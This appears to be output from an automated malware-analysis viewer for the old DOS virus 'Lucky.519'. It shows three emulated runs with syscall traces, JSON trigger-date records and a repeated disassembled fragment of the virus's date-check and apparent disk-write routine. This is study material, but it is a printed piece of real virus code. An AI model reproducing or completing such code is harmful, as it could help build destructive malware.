Sample viewer

vx.netlux.org/Virus.DOS.Lucky.519


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:08:13.006477732Z 42 PC: 12b8b | Get date
0x12b8b: cmp dl, 8
0x12b8e: jne 0x12b93
0x12b90: call 0x12ba1
0x12b93: jmp 0x12a47
0x12b96: lodsw ax, word ptr [si]
0x12b97: jae 0x12b9d
0x12b99: stosw word ptr es:[di], ax
0x12b9a: loop 0x12b96
0x12b9c: ret
0x12b9d: xor ax, 0xf973
0x12ba0: ret
0x12ba1: dec si
0x12ba2: call 0x12bca
0x12ba5: push dx
0x12ba6: call 0x22b96
0x12ba9: mov bh, 0x7c
0x12bab: mov word ptr es:[bx + 0x29], si
0x12baf: mov ax, 0x301
0x12bb2: mov cx, 1
0x12bb5: mov dh, ch
2018-12-17T23:08:13.009349294Z 47 PC: 12a71 | Get disk transfer address
2018-12-17T23:08:13.011495732Z 26 PC: 12a88 | Set disk transfer address
2018-12-17T23:08:13.013044669Z 78 PC: 12a98 | Find first file
2018-12-17T23:08:13.019733225Z 26 PC: 12b76 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":16127,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:45:25.570125531Z 42 PC: 12b8b | Get date
0x12b8b: cmp dl, 8
0x12b8e: jne 0x12b93
0x12b90: call 0x12ba1
0x12b93: jmp 0x12a47
0x12b96: lodsw ax, word ptr [si]
0x12b97: jae 0x12b9d
0x12b99: stosw word ptr es:[di], ax
0x12b9a: loop 0x12b96
0x12b9c: ret
0x12b9d: xor ax, 0xf973
0x12ba0: ret
0x12ba1: dec si
0x12ba2: call 0x12bca
0x12ba5: push dx
0x12ba6: call 0x22b96
0x12ba9: mov bh, 0x7c
0x12bab: mov word ptr es:[bx + 0x29], si
0x12baf: mov ax, 0x301
0x12bb2: mov cx, 1
0x12bb5: mov dh, ch
2018-12-25T12:45:25.573113671Z 47 PC: 12a71 | Get disk transfer address
2018-12-25T12:45:25.574338982Z 26 PC: 12a88 | Set disk transfer address
2018-12-25T12:45:25.575753312Z 78 PC: 12a98 | Find first file
2018-12-25T12:45:25.582724219Z 26 PC: 12b76 | Set disk transfer address

{"DateBased":true,"Day":8,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":16127,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:45:25.842723242Z 42 PC: 12b8b | Get date
0x12b8b: cmp dl, 8
0x12b8e: jne 0x12b93
0x12b90: call 0x12ba1
0x12b93: jmp 0x12a47
0x12b96: lodsw ax, word ptr [si]
0x12b97: jae 0x12b9d
0x12b99: stosw word ptr es:[di], ax
0x12b9a: loop 0x12b96
0x12b9c: ret
0x12b9d: xor ax, 0xf973
0x12ba0: ret
0x12ba1: dec si
0x12ba2: call 0x12bca
0x12ba5: push dx
0x12ba6: call 0x22b96
0x12ba9: mov bh, 0x7c
0x12bab: mov word ptr es:[bx + 0x29], si
0x12baf: mov ax, 0x301
0x12bb2: mov cx, 1
0x12bb5: mov dh, ch
2018-12-25T12:45:25.847491031Z 47 PC: 12a71 | Get disk transfer address
2018-12-25T12:45:25.848508552Z 26 PC: 12a88 | Set disk transfer address
2018-12-25T12:45:25.849530769Z 78 PC: 12a98 | Find first file
2018-12-25T12:45:25.855603916Z 26 PC: 12b76 | Set disk transfer address
2018-12-25T12:45:25.856743153Z 9 PC: 12941 | Display string (Could not find end pointer)